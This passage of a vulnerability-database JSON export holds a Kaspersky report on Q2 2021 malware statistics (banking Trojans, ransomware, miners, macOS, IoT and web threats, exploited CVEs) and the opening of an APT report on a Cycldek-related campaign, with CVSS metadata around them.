"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-30T10:00:31", "type": "securelist", "title": "APT annual review 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2021-28310", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-40449"], "modified": "2021-11-30T10:00:31", "id": "SECURELIST:1F59148E6615695438F94EF4956585AA", "href": "https://securelist.com/apt-annual-review-2021/105127/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-12T10:37:29", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/12091857/abstract_malware_report-990x400.jpg)\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q2 2021:\n\n * Kaspersky solutions blocked 1,686,025,551 attacks from online resources across the globe.\n * Web antivirus recognized 675,832,360 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 119,252 unique users.\n * Ransomware attacks were defeated on the computers of 97,451 unique users.\n * Our file antivirus detected 68,294,298 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2021, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 119,252 unique users.\n\n_Number of unique users attacked by financial malware, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11140610/01-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Geography of financial malware attacks**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country._\n\n_Geography of financial malware attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11140636/02-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 5.8 \n2 | Tajikistan | 5.0 \n3 | Afghanistan | 4.2 \n4 | Uzbekistan | 3.3 \n5 | Lithuania | 2.9 \n6 | Sudan | 2.8 \n7 | Paraguay | 2.5 \n8 | Zimbabwe | 1.6 \n9 | Costa Rica | 1.5 \n10 | Yemen | 1.5 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\nLast quarter, as per tradition, the most widespread family of bankers was ZeuS/Zbot (17.8%), but its share in Q2 almost halved, by 13 p.p. Second place again went to the CliptoShuffler family (9.9%), whose share also fell, by 6 p.p. The Top 3 is rounded out by SpyEye (8.8%), which added 5 p.p., climbing from the eighth place. Note the disappearance of Emotet from the Top 10, which was predictable given the liquidation of its infrastructure in the previous quarter.\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 17.8 \n2 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 9.9 \n3 | SpyEye | Trojan-Spy.Win32.SpyEye | 8.8 \n4 | Trickster | Trojan.Win32.Trickster | 5.5 \n5 | RTM | Trojan-Banker.Win32.RTM | 3.8 \n6 | Danabot | Trojan-Banker.Win32.Danabot | 3.6 \n7 | Nimnul | Virus.Win32.Nimnul | 3.3 \n8 | Cridex | Backdoor.Win32.Cridex | 2.3 \n9 | Nymaim | Trojan.Win32.Nymaim | 1.9 \n10 | Neurevt | Trojan.Win32.Neurevt | 1.6 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n#### Attack on Colonial Pipeline and closure of DarkSide\n\nRansomware attacks on large organizations continued in Q2. Perhaps the most notable event of the quarter was the [attack by the DarkSide group on Colonial Pipeline](<https://ics-cert.kaspersky.com/reports/2021/05/21/darkchronicles-the-consequences-of-the-colonial-pipeline-attack/>), one of the largest fuel pipeline operators in the US. The incident led to fuel outages and a state of emergency in four states. The results of the investigation, which involved the FBI and several other US government agencies, was reported to US President Joe Biden.\n\nFor the cybercriminals, this sudden notoriety proved unwelcome. In their blog, DarkSide's creators heaped the blame on third-party operators. Another post was published stating that DarkSide's developers had lost access to part of their infrastructure and were shutting down the service and the affiliate program.\n\nAnother consequence of this high-profile incident was a new rule on the Russian-language forum XSS, where many developers of ransomware, including REvil (also known as Sodinokibi or Sodin), LockBit and Netwalker, advertise their affiliate programs. The new rule forbade the advertising and selling of any ransomware programs on the site. The administrators of other forums popular with cybercriminals took similar decisions.\n\n#### Closure of Avaddon\n\nAnother family of targeted ransomware whose owners shut up shop in Q2 is Avaddon. At the same time as announcing the shutdown, the attackers [provided](<https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/>) Bleeping Computer with the decryption keys.\n\n#### Clash with Clop\n\nUkrainian police [searched](<https://cyberpolice.gov.ua/news/kiberpolicziya-vykryla-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shyfruvalnyka-ta-nanesenni-inozemnym-kompaniyam-piv-milyarda-dolariv-zbytkiv-2402/>) and arrested members of the Clop group. Law enforcement agencies also deactivated part of the cybercriminals' infrastructure, which [did not](<https://www.bleepingcomputer.com/news/security/clop-ransomware-is-back-in-business-after-recent-arrests/>), however, stop the group's activities.\n\n#### Attacks on NAS devices\n\nIn Q2, cybercriminals stepped up their attacks on network-attached storage (NAS) devices. There appeared the new [Qlocker](<https://support.qnap.ru/hc/ru/articles/360021328659-\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c-Qnap-Ransomware-Qlocker>) family, which packs user files into a password-protected 7zip archive, plus our old friends [ech0raix](<https://www.qnap.com/en/security-advisory/QSA-21-18>) and [AgeLocker](<https://www.qnap.com/en-us/security-advisory/QSA-21-15>) began to gather steam.\n\n### Number of new ransomware modifications\n\nIn Q2 2021, we detected 14 new ransomware families and 3,905 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q2 2020 \u2014 Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141411/03-en-ru-es-malware-report-q2-2021-graphs-pc.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q2 2021, Kaspersky products and technologies protected 97,451 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141438/04-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Geography of ransomware attacks\n\n_Geography of attacks by ransomware Trojans, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141505/05-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.85 \n2 | Ethiopia | 0.51 \n3 | China | 0.49 \n4 | Pakistan | 0.40 \n5 | Egypt | 0.38 \n6 | Indonesia | 0.36 \n7 | Afghanistan | 0.36 \n8 | Vietnam | 0.35 \n9 | Myanmar | 0.35 \n10 | Nepal | 0.33 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 20.66 \n2 | Stop | Trojan-Ransom.Win32.Stop | 19.70 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 9.10 \n4 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 6.37 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.08 \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 5.87 \n7 | (generic verdict) | Trojan-Ransom.Win32.Agent | 5.19 \n8 | PolyRansom/VirLock | Virus.Win32.Polyransom / Trojan-Ransom.Win32.PolyRansom | 2.39 \n9 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 1.48 \n10 | (generic verdict) | Trojan-Ransom.MSIL.Encoder | 1.26 \n \n_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q2 2021, Kaspersky solutions detected 31,443 new modifications of miners.\n\n_Number of new miner modifications, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141534/06-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Number of users attacked by miners\n\nIn Q2, we detected attacks using miners on the computers of 363,516 unique users of Kaspersky products worldwide. At the same time, the number of attacked users gradually decreased during the quarter; in other words, the downward trend in miner activity returned.\n\n_Number of unique users attacked by miners, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141602/07-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141627/08-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 3.99 \n2 | Ethiopia | 2.66 \n3 | Rwanda | 2.19 \n4 | Uzbekistan | 1.61 \n5 | Mozambique | 1.40 \n6 | Sri Lanka | 1.35 \n7 | Vietnam | 1.33 \n8 | Kazakhstan | 1.31 \n9 | Azerbaijan | 1.21 \n10 | Tanzania | 1.19 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\nQ2 2021 injected some minor changes into our statistics on exploits used by cybercriminals. In particular, the share of exploits for Microsoft Office dropped to 55.81% of the total number of threats of this type. Conversely, the share of exploits attacking popular browsers rose by roughly 3 p.p. to 29.13%.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141656/09-en-malware-report-q2-2021-graphs-pc.png>))_\n\nMicrosoft Office exploits most often tried to utilize the memory corruption vulnerability [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>). This error can occur in the Equation Editor component when processing objects in a specially constructed document, and its exploitation causes a buffer overflow and allows an attacker to execute arbitrary code. Also seen in Q2 was the similar vulnerability [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), which causes a buffer overflow on the stack in the same component. Lastly, we spotted an attempt to exploit the [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>) vulnerability, which, like other bugs in Microsoft Office, permits the execution of arbitrary code in vulnerable versions of the software.\n\nQ2 2021 was marked by the emergence of several dangerous vulnerabilities in various versions of the Microsoft Windows family, many of them observed in the wild. Kaspersky alone found three vulnerabilities used in targeted attacks:\n\n * [CVE-2021-28310](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28310>) \u2014 an out-of-bounds (OOB) write vulnerability in the Microsoft DWM Core library used in Desktop Window Manager. Due to insufficient checks in the data array code, an unprivileged user using the DirectComposition API can write their own data to the memory areas they control. As a result, the data of real objects is corrupted, which, in turn, can lead to the execution of arbitrary code;\n * [CVE-2021-31955](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955>) \u2014 an information disclosure vulnerability that exposes information about kernel objects. Together with other exploits, it allows an intruder to attack a vulnerable system;\n * [CVE-2021-31956](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956>) \u2014 a vulnerability in the ntfs.sys file system driver. It causes incorrect checking of transferred sizes, allowing an attacker to inflict a buffer overflow by manipulating parameters.\n\nYou can read more about these vulnerabilities and their exploitation in our articles [PuzzleMaker attacks with Chrome zero-day exploit chain](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>) and [Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>).\n\nOther security researchers found a number of browser vulnerabilities, including:\n\n * [CVE-2021-33742](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>) \u2014 a bug in the Microsoft Trident browser engine (MSHTML) that allows writing data outside the memory of operable objects;\n * Three Google Chrome vulnerabilities found in the wild that exploit bugs in various browser components: [CVE-2021-30551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30551>) \u2014 a data type confusion vulnerability in the V8 scripting engine; [CVE-2021-30554](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30554>) \u2014 a use-after-free vulnerability in the WebGL component; and [CVE-2021-21220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21220>) \u2014 a heap corruption vulnerability;\n * Three vulnerabilities in the WebKit browser engine, now used mainly in Apple products (for example, the Safari browser), were also found in the wild: [CVE-2021-30661](<https://support.apple.com/en-us/HT212317>) \u2014 a use-after-free vulnerability; [CVE-2021-30665](<https://support.apple.com/en-us/HT212336>) \u2014 a memory corruption vulnerability; and [CVE-2021-30663](<https://support.apple.com/en-us/HT212336>) \u2014 an integer overflow vulnerability.\n\nAll of these vulnerabilities allow a cybercriminal to attack a system unnoticed if the user opens a malicious site in an unpatched browser.\n\nIn Q2, two similar vulnerabilities were found ([CVE-2021-31201](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201>) and [CVE-2021-31199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199>)), exploiting integer overflow bugs in the Microsoft Windows Cryptographic Provider component. Using these vulnerabilities, an attacker could prepare a special signed document that would ultimately allow the execution of arbitrary code in the context of an application that uses the vulnerable library.\n\nBut the biggest talking point of the quarter was the [critical vulnerabilities CVE-2021-1675 and CVE-2021-34527](<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>) in the Microsoft Windows Print Spooler, in both server and client editions. Their discovery, together with a [proof of concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), caused a stir in both the expert community and the media, which dubbed one of the vulnerabilities PrintNightmare. Exploitation of these vulnerabilities is quite trivial, since Print Spooler is enabled by default in Windows, and the methods of compromise are available even to unprivileged users, including remote ones. In the latter case, the RPC mechanism can be leveraged for compromise. As a result, an attacker with low-level access can take over not only a local machine, but also the domain controller, if these systems have not been updated, or available [risk mitigation methods](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) against these vulnerabilities have not been applied.\n\nAmong the network threats in Q2 2021, attempts to brute-force passwords in popular protocols and services (RDP, SSH, MSSQL, etc.) are still current. Attacks using EternalBlue, EternalRomance and other such exploits remain prevalent, although their share is gradually shrinking. New attacks include [CVE-2021-31166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31166>), a vulnerability in the Microsoft Windows HTTP protocol stack that causes a denial of service during processing of web-server requests. To gain control over target systems, attackers are also using the previously found NetLogon vulnerability ([CVE-2020-1472](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>)) and, for servers running Microsoft Exchange Server, vulnerabilities recently discovered while researching targeted attacks by the [HAFNIUM](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) group.\n\n## Attacks on macOS\n\nAs for threats to the macOS platform, Q2 will be remembered primarily for the appearance of new samples of the XCSSET Trojan. Designed to steal data from browsers and other applications, the malware is notable for spreading itself through infecting projects in the Xcode development environment. The Trojan takes the form of a bash script packed with the SHC utility, allowing it to evade macOS protection, which does not block script execution. During execution of the script, the SHC utility uses the RC4 algorithm to decrypt the payload, which, in turn, downloads additional modules.\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.j | 14.47 \n2 | AdWare.OSX.Pirrit.ac | 13.89 \n3 | AdWare.OSX.Pirrit.o | 10.21 \n4 | AdWare.OSX.Pirrit.ae | 7.96 \n5 | AdWare.OSX.Bnodlero.at | 7.94 \n6 | Monitor.OSX.HistGrabber.b | 7.82 \n7 | Trojan-Downloader.OSX.Shlayer.a | 7.69 \n8 | AdWare.OSX.Bnodlero.bg | 7.28 \n9 | AdWare.OSX.Pirrit.aa | 6.84 \n10 | AdWare.OSX.Pirrit.gen | 6.44 \n11 | AdWare.OSX.Cimpli.m | 5.53 \n12 | Trojan-Downloader.OSX.Agent.h | 5.50 \n13 | Backdoor.OSX.Agent.z | 4.64 \n14 | Trojan-Downloader.OSX.Lador.a | 3.92 \n15 | AdWare.OSX.Bnodlero.t | 3.64 \n16 | AdWare.OSX.Bnodlero.bc | 3.36 \n17 | AdWare.OSX.Ketin.h | 3.25 \n18 | AdWare.OSX.Bnodlero.ay | 3.08 \n19 | AdWare.OSX.Pirrit.q | 2.84 \n20 | AdWare.OSX.Pirrit.x | 2.56 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nAs in the previous quarter, a total of 15 of the Top 20 threats for macOS are adware programs. The Pirrit and Bnodlero families have traditionally stood out from the crowd, with the former accounting for two-thirds of the total number of threats.\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141728/10-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | India | 3.77 \n2 | France | 3.67 \n3 | Spain | 3.45 \n4 | Canada | 3.08 \n5 | Italy | 3.00 \n6 | Mexico | 2.88 \n7 | Brazil | 2.82 \n8 | USA | 2.69 \n9 | Australia | 2.53 \n10 | Great Britain | 2.33 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q2 2021, first place by share of attacked users went to India (3.77%), where adware applications from the Pirrit family were most frequently encountered. A comparable situation was observed in France (3.67%) and Spain (3.45%), which ranked second and third, respectively.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q2 2021, as before, most of the attacks on Kaspersky traps came via the Telnet protocol.\n\nTelnet | 70.55% \n---|--- \nSSH | 29.45% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q2 2021_\n\nThe statistics for cybercriminal working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 63.06% \n---|--- \nSSH | 36.94% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q2 2021_\n\n**Top 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 30.25% \n2 | Trojan-Downloader.Linux.NyaDrop.b | 27.93% \n3 | Backdoor.Linux.Mirai.ba | 5.82% \n4 | Backdoor.Linux.Agent.bc | 5.10% \n5 | Backdoor.Linux.Gafgyt.a | 4.44% \n6 | Trojan-Downloader.Shell.Agent.p | 3.22% \n7 | RiskTool.Linux.BitCoinMiner.b | 2.90% \n8 | Backdoor.Linux.Gafgyt.bj | 2.47% \n9 | Backdoor.Linux.Mirai.cw | 2.52% \n10 | Backdoor.Linux.Mirai.ad | 2.28% \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nDetailed IoT threat statistics are published in our Q2 2021 DDoS report: <https://securelist.com/ddos-attacks-in-q2-2021/103424/#attacks-on-iot-honeypots>\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that serve as sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q2 2021, Kaspersky solutions blocked 1,686,025,551 attacks from online resources located across the globe. 675,832,360 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources by country, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141800/13-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Belarus | 23.65 \n2 | Mauritania | 19.04 \n3 | Moldova | 18.88 \n4 | Ukraine | 18.37 \n5 | Kyrgyzstan | 17.53 \n6 | Algeria | 17.51 \n7 | Syria | 15.17 \n8 | Uzbekistan | 15.16 \n9 | Kazakhstan | 14.80 \n10 | Tajikistan | 14.70 \n11 | Russia | 14.54 \n12 | Yemen | 14.38 \n13 | Tunisia | 13.40 \n14 | Estonia | 13.36 \n15 | Latvia | 13.23 \n16 | Libya | 13.04 \n17 | Armenia | 12.95 \n18 | Morocco | 12.39 \n19 | Saudi Arabia | 12.16 \n20 | Macao | 11.67 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average during the quarter, 9.43% of computers of Internet users worldwide were subjected to at least one **Malware-class** web attack.\n\n_Geography of web-based malware attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141830/14-en-malware-report-q2-2021-graphs-pc.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q2 2021, our File Anti-Virus detected **68,294,298** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Turkmenistan | 49.38 \n2 | Tajikistan | 48.11 \n3 | Afghanistan | 46.52 \n4 | Uzbekistan | 44.21 \n5 | Ethiopia | 43.69 \n6 | Yemen | 43.64 \n7 | Cuba | 38.71 \n8 | Myanmar | 36.12 \n9 | Syria | 35.87 \n10 | South Sudan | 35.22 \n11 | China | 35.14 \n12 | Kyrgyzstan | 34.91 \n13 | Bangladesh | 34.63 \n14 | Venezuela | 34.15 \n15 | Benin | 32.94 \n16 | Algeria | 32.83 \n17 | Iraq | 32.55 \n18 | Madagascar | 31.68 \n19 | Mauritania | 31.60 \n20 | Belarus | 31.38 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141906/15-en-malware-report-q2-2021-graphs-pc.png>))_\n\nOn average worldwide, **Malware-class** local threats were recorded on 15.56% of users' computers at least once during the quarter. Russia scored 17.52% in this rating.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-08-12T10:00:12", "type": "securelist", "title": "IT threat evolution in Q2 2021. PC statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2020-1472", "CVE-2021-1675", "CVE-2021-21220", "CVE-2021-28310", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-31166", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-33742", "CVE-2021-34527"], "modified": "2021-08-12T10:00:12", "id": "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "href": "https://securelist.com/it-threat-evolution-in-q2-2021-pc-statistics/103607/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-12T10:37:29", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/12091857/abstract_malware_report-990x400.jpg)\n\n## Targeted attacks\n\n### The leap of a Cycldek-related threat actor\n\nIt is quite common for Chinese-speaking threat actors to share tools and methodologies: one such example is the infamous "DLL side-loading triad": a legitimate executable, a malicious DLL to be [side-loaded](<https://attack.mitre.org/techniques/T1574/002/>) by it and an encoded payload, generally dropped from a self-extracting archive. This was first thought to be a signature of [LuckyMouse](<https://securelist.com/luckymouse-hits-national-data-center/86083/>), but we have observed other groups using similar "triads", including HoneyMyte. While it is not possible to attribute attacks based on this technique alone, efficient detection of such triads reveals more and more malicious activity.\n\nWe recently described one such file, called "FoundCore", which caught our attention because of the various improvements it brought to this well-known infection vector. We discovered the malware as part of an attack against a high-profile organization in Vietnam. From a high-level perspective, the infection chain follows the expected execution flow:\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06085101/Cycldek_01-1024x430.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06085101/Cycldek_01.jpg>)\n\nHowever, in this case, the shellcode was heavily obfuscated \u2013 the technical details were presented in the '[The leap of a Cycldek-related threat actor](<https://securelist.com/the-leap-of-a-cycldek-related-threat-actor/101243/>)' report. We found the loader for this file so interesting that we decided to base one of the tracks of our [Targeted Malware Reverse Engineering](<https://xtraining.kaspersky.com/courses/targeted-malware-reverse-engineering>) course on it.\n\nThe final payload is a remote administration tool that provides full control over the victim machine to its operators. Communication with the server can take place either over raw TCP sockets encrypted with RC4, or via HTTPS.\n\nIn the vast majority of the incidents we discovered, FoundCore executions were preceded by the opening of malicious RTF documents downloaded from static.phongay[.]com \u2013 all generated using [RoyalRoad](<https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper>) and attempting to exploit CVE-2018-0802. All of these documents were blank, suggesting the existence of precursor documents \u2013 possibly delivered by means of spear-phishing or a previous infection \u2013 that trigger the download of the RTF files. Successful exploitation leads to the deployment of further malware \u2013 named DropPhone and CoreLoader.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06091732/Cycldek_06.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06091732/Cycldek_06.jpg>)\n\nOur telemetry indicates that dozens of organizations were affected, belonging to the government or military sector, or otherwise related to the health, diplomacy, education or political verticals. Eighty percent of the targets were in Vietnam, though we also identified occasional targets in Central Asia and Thailand.\n\nWhile Cycldek has so far been considered one of the least sophisticated Chinese-speaking threat actors, its targeting is consistent with what we observed in this campaign \u2013 which is why we attribute the campaign, with low confidence, to this threat actor.\n\n### Zero-day vulnerability in Desktop Window Manager used in the wild\n\nWhile analyzing the 